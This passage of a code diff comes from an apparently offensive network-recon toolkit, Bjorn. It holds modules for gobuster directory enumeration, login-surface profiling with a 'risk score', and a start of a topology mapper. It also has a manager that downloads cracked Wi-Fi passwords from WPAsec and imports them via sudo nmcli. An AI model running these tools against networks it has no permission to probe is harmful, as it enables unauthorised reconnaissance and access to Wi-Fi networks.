self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"): path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"General execution error: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

319
actions/wpasec_potfiles.py Normal file
View File

@@ -0,0 +1,319 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()

847
actions/yggdrasil_mapper.py Normal file
View File

@@ -0,0 +1,847 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
the routing path to the target IP. Records hop IPs and RTT per hop.
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
optionally verifies a handful of key ports with TCP connect probes.
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
No matplotlib or networkx dependency -- pure JSON output.
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import os
import socket
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="yggdrasil_mapper.py", level=logging.DEBUG)
# Silence scapy logging before import
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
_SCAPY_AVAILABLE = False
try:
from scapy.all import IP, ICMP, sr1, conf as scapy_conf
scapy_conf.verb = 0
_SCAPY_AVAILABLE = True
except ImportError:
logger.warning("scapy not available; falling back to subprocess traceroute")
except Exception as exc:
logger.warning(f"scapy import error ({exc}); falling back to subprocess traceroute")
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_status = "yggdrasil_mapper"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 10
b_cooldown = 3600
b_rate_limit = "3/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 6
b_risk_level = "low"
b_enabled = 1
b_tags = ["topology", "network", "recon", "mapping"]
b_category = "recon"
b_name = "Yggdrasil Mapper"
b_description = (
"Network topology mapper that discovers routing paths via traceroute, enriches "
"nodes with service data from the DB, and saves a merged JSON topology graph. "
"Lightweight -- no matplotlib or networkx required."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "YggdrasilMapper.png"
b_args = {
"max_depth": {
"type": "slider",
"label": "Max trace depth (hops)",
"min": 5,
"max": 30,
"step": 1,
"default": 15,
"help": "Maximum number of hops for traceroute probes.",
},
"probe_timeout": {
"type": "slider",
"label": "Probe timeout (s)",
"min": 1,
"max": 5,
"step": 1,
"default": 2,
"help": "Timeout in seconds for each ICMP / TCP probe.",
},
}
b_examples = [
{"max_depth": 15, "probe_timeout": 2},
{"max_depth": 10, "probe_timeout": 1},
{"max_depth": 30, "probe_timeout": 3},
]
b_docs_url = "docs/actions/YggdrasilMapper.md"
# -------------------- Constants --------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
_VERIFY_PORTS = [22, 80, 443, 445, 3389, 8080]
# -------------------- Helpers --------------------
def _generate_mermaid_topology(topology: Dict[str, Any]) -> str:
"""Generate a Mermaid.js diagram string from topology data."""
lines = ["graph TD"]
# Define styles
lines.append(" classDef target fill:#f96,stroke:#333,stroke-width:2px;")
lines.append(" classDef router fill:#69f,stroke:#333,stroke-width:1px;")
